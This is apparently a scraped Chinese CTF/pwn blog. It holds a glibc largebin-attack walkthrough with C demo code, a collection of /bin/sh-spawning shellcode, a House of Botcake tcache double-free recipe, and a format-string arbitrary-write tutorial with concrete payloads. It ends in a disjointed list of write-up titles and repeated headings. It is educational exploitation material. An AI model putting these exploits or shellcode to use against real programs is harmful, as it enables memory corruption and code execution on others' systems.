在unsorted-bin chunk被sort进large-bin时，触发任意地址写, 可以往任意地址中写入一个不可控的未知大数 (实际为某堆地址)。
实现以下目的：

修改循环次数
修改global_max_fast 或arena->max_fast的值，从而把size>0x80的chunk分配到fastbin中;或者在目标二进制使用mallopt(M_MXFAST,0)禁用fastbin后，重新启用
修改能够输出的变量，从而泄露堆地址

2.2 过程简述

假设堆状态如下：

unsorted-bin: A(0x400)large-bin: 0x400： B(0x410)

若 B 存在Write After Free, 则修改 B->bk_nextsize 为 目标地址(target) 。
触发A加入到large-bin链表中，则会导致 A->bk_nextsize = B->bk_nextsize; A->bk_nextsize->fd_nextsize = B 即 target->fd_nextsize = A 。

即

unsorted-bin: large-bin:0x400: B(0x410) -> A(0x400) [A插入时触发攻击]

2.3 代码表示

static uint64_t target; //假设需要被更改值的目标地址
int attack(){
    void* A, * B, * C;

    A = malloc(0x400 - 8); //A小
    malloc(0x18);
    B = malloc(0x410 - 8); //B大
    malloc(0x18);

    free(B);
    // unsortedbin: B
    // largebin: empty

    malloc(0x600);
    // unsortedbin: empty
    // largebin: 0x400: B(0x410)

    free(A)；
    // unsortedbin: A
    // largebin: 0x400: B(0x410)

    * ( uint64_t * )(B + 0x18) = ( uint64_t ) ( &target ) - 0x20
    //edit: B->bk_nextsize = target_over  && let: target_over->fd_nextsize = target

    malloc(0x600);
    // unsortedbin: empty
    // largebin: 0x400: B(0x410)->A(0x400) {触发：A->bk_nextsize->fd_nextsize = A}
}

3. 原理分析

在glibc项目malloc.c文件_int_malloc函数中：
在chunk被从unsortedbin中sort下来之后的代码部分

. . . 
          /* place chunk in bin */
          //// 若smallbin范围
          if (in_smallbin_range (size))
            {
              victim_index = smallbin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;
            }
          else ////若在largebin范围
            {
              victim_index = largebin_index (size);
              bck = bin_at (av, victim_index);
              fwd = bck->fd;
              //// largebin:: [bck]: fwd
              /* maintain large bins in sorted order * /
              if (fwd != bck) //// largebin不为空
                {
                  /* Or with inuse bit to speed comparisons */
                  size |= PREV_INUSE;
                  /* if smaller than smallest, bypass loop below */
                  assert (chunk_main_arena (bck->bk));
                  if ((unsigned long) (size)
      < (unsigned long) chunksize_nomask (bck->bk)) ////确认victim为最小，因此插入到链表最后
                    {
                      fwd = bck;
                      bck = bck->bk;
                      //// largebin:: [fwd]: bck
                      //// 等同于2节例子中：[av]: B 

                      victim->fd_nextsize = fwd->fd; ////fwd->fd 即为bck,也就是例子里的B
                      victim->bk_nextsize = fwd->fd->bk_nextsize; //// 因此victim->bk_nextsize = bck->bk_nextsize (即A->bk_nextsize = B->bk_nextsize)
                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
 ////即bck->bk_nextsize = bck->bk_nextsize->fd_nextsize = victim
 ////即例子：B->bk_nextsize = B->bk_nextsize->fd_nextsize = A
 ////==> largebin attack的精髓即：B->bk_nextsize->fd_nextsize = A， 
 ////==> 而它通过两步计算得到：victim->bk_nextsize = fwd->fd->bk_nextsize; 和 victim->bk_nextsize->fd_nextsize = victim;
                    }

参考

heap_exploit_2.31/largebin_attack.c

Shellcode Collection

2022-03-21T12:44:19.000Z

32位

有"\x00"最短 20 byte

shellcode= '''            
xor ecx,ecx               
mul ecx                   
mov al,0xb                
push 0x68732f             
push 0x6e69622f           
mov ebx,esp               
int 0x80                  
'''                       
shellcode=asm(shellcode)

无"\x00"最短 21 byte

xor ecx,ecx
mul ecx
push eax
mov al,0xb
push 0x68732f2f   
push 0x6e69622f   
mov ebx,esp
int 0x80

标准shellcode 23 byte

xor ecx,ecx
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor eax,eax
mov al,0xB
int 0x80

64位

最短有"\x00" 22 byte

xor rsi,rsi
mul esi
mov rbx,0x68732f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall

最短无"\x00" 23 byte

xor rsi,rsi
mul esi
push rax
mov rbx,0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 59
syscall

标准shellcode 31 byte

xor    rdi,rdi
xor    rsi,rsi
xor    rdx,rdx
xor    rax,rax
push   rax
mov rbx,0x68732f2f6e69622f
push   rbx
mov    rdi,rsp
mov    al,0x3b
syscall

转载自:

Linux_ShellCode

HeapAttack: House_of_Botcake

2022-03-18T12:16:10.000Z

1. 漏洞样式

glibc版本：≥ 2.3.1
Tcache：开启
漏洞要求：double free

2. 利用方法

2.1 攻击效果

绕过Tcache的 tcache-dup 检查，将 可控chunk 插入 Tcache-list,修改 可控chunk 的 fd 字段，从而 最终实现 任意地址写’。

2.2 攻击过程

伪代码表示如下

size = 0x108

mem_lst = [ malloc(size) for x in range(7) ] #创建7个chunk

a = malloc(size) 
b = malloc(size)  #a,b chunk是主角

malloc(0x18) #和top_chunk隔离，防止forward-consolidation

[free(x) for x in mem_lst] #把7个chunk free到tcache中,tcache被填满

free(a) #因tcache已满，a、b进unsorted-bin
free(b) #a、b邻接,因此发生consolidate合并成一个chunk在unsorted-bin中

malloc(size) #一次分配后tcache有一个空位
free(b) #对b使用double-free攻击。由于b不在tcache中，因此通过tcache检查被加入到tcache中。

c = malloc(size + 0x30) #unsorted-bin发生remaindering，chunk-b的前0x30被memory-c overlap

payload = size * b"\0" + p64(size) + p64(target_address) 
#不同size时的payload写法不同；但目的是target_address覆盖到 b->fd

write(c, payload)  ##这里将target_address链接到tcache list中，下次对tcache size的内存请求即可分配到目标地址的内存chunk

target_memory = malloc(size)
write(target_memory, arbitrary_value)

参考：

heap_exploit_2.31/house_of_botcake.c

Format-String Attack

2022-03-18T03:42:27.000Z

1. 漏洞样式

通常情况下漏洞程序样式：

Table 1. Vulnerable Code Demo

1
2
3

char buffer[1024];
gets(buffer, 1024);
printf(buffer);

字符串 buffer 可控且作为 printf 的第一个参数。当其中包含 格式化字符(例如%s, %d, %p等) 时，栈上的内容就会被当做printf的第2个、第3个参数等被输出。

2. 利用方法

2.1 确定偏移

输入字符串（即Table 1中buffer）在栈上的偏移，即buffer被printf当做参数时，作为第几个参数。参数序号从0开始： printf(arg0, arg1, arg2, …, argn); 第10参数即表示arg10

步骤1. break printf ；即在 printf 下断点
步骤2. 输入 %p%p%p%p 等特殊字符
步骤3. 在 printf 函数断点，使用 stack 命令查看栈。找到 %p%p%p%p 特殊字符串在栈上的位置。如Figure 1所示。

Figure 1. printf stack illustration

需注意图中①断点在printf入口，已跳转到printf 但尚未执行printf中指令（尤其是栈指令，否则栈布局会改变）；注意图中② 0b 即字符串 %p%p%p%p 距离栈顶( esp )的偏移为 11；由于在 esp + 0 的位置存放函数返回地址。因此 %p%p%p%p 字符串实际上位于 栈上 第 10 个参数。

步骤4. 根据不同架构确定 buffer 在 printf 函数参数的序号。参考函数调用约定。
- a). x86架构
  x86架构的函数参数全部通过栈传递，因此 buffer 是 printf 的第10个参数。
- b). x64架构
  x64传参顺序为rdi, rsi, rdx, rcx, r8, r9; 之后才使用栈传参。因此若 Figure 1 在x64架构中，buffer对应的是printf函数的第（0xb + 6 - 1)= 16 个参数(参数序号从0开始，0，1，2，…, 16)。

2.2 实现任意地址写

往 任意目标地址(记为target_address) 中写入 任意值(记为target_value) 。

1). 任意值的控制：通过格式化字符串 %Mc 其中 M=target_value来操控
2). 任意地址的控制：将目标地址(target_address)写入buffer字符串中；并通过格式化字符串 %N$n来指定将 *当前printf已经输字符个数* 写入到第 N 个参数指定的地址中。其中 N即为’使用2.1中方法确定的‘’在buffer字符串中的‘’target_address在栈上的位置对应的printf的参数序号‘。(该处使用’'分句停顿帮助阅读)

例如：

2.2.1 当`target_value` 较小时，直接写入

假如buffer字符串位于printf第10个参数的位置(即arg10、即printf栈0xb(10+1)参数位）

Table 2. Payload Demo 1

1 2	// 写4到target_address payload1 = p32(target_address) + b'%10$n\0'

其中：
payload1实现写4(p32为4byte)到target_address

Table 3. Payload Demo 2

1
2
3

payload2 = b'%100c' + b'%13$n'
payload2 = payload2.ljust(12, b'a')
payload2 += p32(target_address)

payload2实现写100到target_address, 此处由于target_adress没有写在字符串的开头，因此需要重新计算在栈上的偏移：字符串开头位于arg10处，字符串中target_address之前有12个字符即占3个参数位，因此target_address对应的参数位为13

2.2.2 当target_value太大时，分字节写入

假如buffer字符串位于printf第10个参数的位置(即arg10、即printf栈0xb(10+1)参数位）；且需要向target_address 中写入的target_value为*0xbaedbeef*。

实际上就是令：*(int8*)target_address = 0xef = 239*(int8*)(target_address + 1) = 0xbe = 190*(int8*)(target_address + 2) = 0xed = 237*(int8*)(target_address + 3) = 0xba = 186

这种情况下使用 %N$hhn 向目标地址写入int8宽度值和使用 %N$hn 向目标地址写入int16宽度值，将会非常有用。

那么可以使用如下payload实现：

Table 4. Payload Demo 3

payload = p32(target_address)          //arg10
payload += p32(target_address + 1)     //arg11
payload += p32(target_address + 2)     //arg12
payload += p32(target_address + 3)     //arg13
//已有16byte输出；写入时从小到大写；即186->190->237->239
// 186 - 16 = 170
payload += b"%170c%13$hhn"
// 190 - 186 = 4
payload += b"%4c%11$hhn"
// 237 - 190 = 47
payload += b"%47c%12$hhn"
// 239 - 237 = 2
payload += b"%2c%10$hhn"

2.2.3 使用`pwnlib`的`fmtstr_payload`函数自动构造payload

示例如下：

Table 5. Payload Demo 4: fmtstr_payload

from pwn import *
from pwnlib.util import misc
//payload = fmtstr_payload(10, {0x804c044: 0x1})
payload = fmtstr_payload(10, {target_address: target_value})
io.send(payload)

2. 注意事项

3. 原理说明

参考：
fmtstr_attack on ctf-wiki

404

2022-02-23T11:48:56.000Z

Page Not Found

A4x7eq28'Blog

把本地可用的Proxy代理服务器带到ssh远程服务器上

1. 使用下面的脚本ssh登录阿里云的服务器B

2. 在A机器上，将8080端口映射到proxy.corp.com:8080

2.1 安装haproxy

2.2 配置haproxy

2.3 启动haproxy

3. 在B机器上(阿里云的远程服务器）上使用127.0.0.1:8080作为代理，即可。

WriteUp: 2022DASCTF Apr X FATE: good_luck

0x0 Checksec

0x1 Reverse Enginnering

0x2 Analyze

0x3 Exploit Code

0x4 Output Example

0x5 The Challenge

WriteUp: ciscn_2019_sw_7

0x0 Checksec

0x1 Reverse Enginnering

0x2 Analyze

0x3 Exploit Code

0x4 Output Example

0x5 The Challenge

WriteUp: Baby Tcache (ciscn_2019_n_2)

0x0 Checksec

0x1 Reverse Enginnering

0x2 Analyze

0x3 Exploit Code

0x4 Output Example

0x5 The Challenge

WriteUp: w0odpeck3r's Nest

0x0 Checksec

0x1 Reverse Enginnering

0x2 Analyze

0x3 Exploit Code

0x4 Output Example

0x5 The Challenge

WriteUp: SECPROG calculator

0x0 Checksec

0x1 Reverse Enginnering

0x2 Analyze

0x3 Exploit Code

0x4 Output Example

0x5 The Challenge

System Call Table - x86_64

System Call Table - x86_32

WriteUp: 0CTF 2016 warmup

0x0 Checksec

0x1 Reverse Enginnering

0x2 Analyze

0x3 Exploit Code

0x4 Output Example

0x5 The Challenge

WriteUp: hitcontraining_playfmt

Checksec

Reverse Engineering

Analyze

Exploit Code

Output Example

The Challenge

AFL++ Frida-Mode: Usecases for testing and debugging

Fuzzing

GDB Debugging

Scripting

AFL++ Frida-Mode Scripting

Scripting

Example

Stripped binaries

Persistent hook

Advanced persistence

Replacing LLVMFuzzerTestOneInput

Hooking main

Library Fuzzing

Patching

Advanced patching

OSX

API

HeapAttack: House_of_Orange

漏洞样式

2. 利用方法

2.1 攻击效果

Hooking `main`

2.2.1 当`target_value` 较小时，直接写入

2.2.3 使用`pwnlib`的`fmtstr_payload`函数自动构造payload